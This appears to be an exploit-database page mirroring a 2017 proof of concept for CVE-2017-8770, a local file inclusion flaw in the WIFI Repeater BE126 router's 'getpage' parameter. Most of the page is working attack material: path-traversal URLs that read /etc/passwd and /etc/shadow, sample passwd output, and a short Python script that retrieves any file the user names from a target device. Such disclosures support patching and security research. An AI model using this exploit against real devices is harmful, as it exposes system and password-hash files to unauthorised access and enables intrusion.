header-logo
Suggest Exploit
vendor:
WIFI Repeater BE126
by:
Hay Mizrachi, Omer Kaspi
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: WIFI Repeater BE126
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2017-8770
CPE: a:twsz:wifi_repeater_be126
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Ubuntu 16.04
2017

WIFI Repeater BE126 – Local File Inclusion

The 'getpage' HTTP parameter is not escaped in include file, which allows attackers to include local files with a root privilege user, such as /etc/password, /etc/shadow, etc.

Mitigation:

Ensure that user input is properly sanitized and escaped before being used in file inclusion operations.
Source

Exploit-DB raw data:

# Exploit Title:  WIFI Repeater BE126 – Local File Inclusion
# Date Publish: 23/08/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi

# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04

# CVE: CVE-2017-8770

1 - Description:

'getpage' HTTP parameter is not escaped in include file,

Which allow us to include local files with a root privilege user, aka /etc/password,
/etc/shadow and so on.

2 - Proof of Concept:

http://Target/cgi-bin/webproc?getpage=[LFI]

 

/etc/passwd:

http://Target/cgi-bin/webproc?getpage=../../../../etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard


#root:x:0:0:root:/root:/bin/bash

root:x:0:0:root:/root:/bin/sh

#tw:x:504:504::/home/tw:/bin/bash

#tw:x:504:504::/home/tw:/bin/msh

 

/etc/shadow;

 

http://Target/cgi-bin/webproc?getpage=../../../../etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard

 

import urllib2, httplib, sys
 
'''
	LFI PoC By Hay and Omer
'''
 
print "[+] cgi-bin/webproc exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
 
ip_add = sys.argv[1]
fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')
 
print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard"
print urllib2.urlopen(URL).read()

Navigation

Suggest Exploit

Services By CQR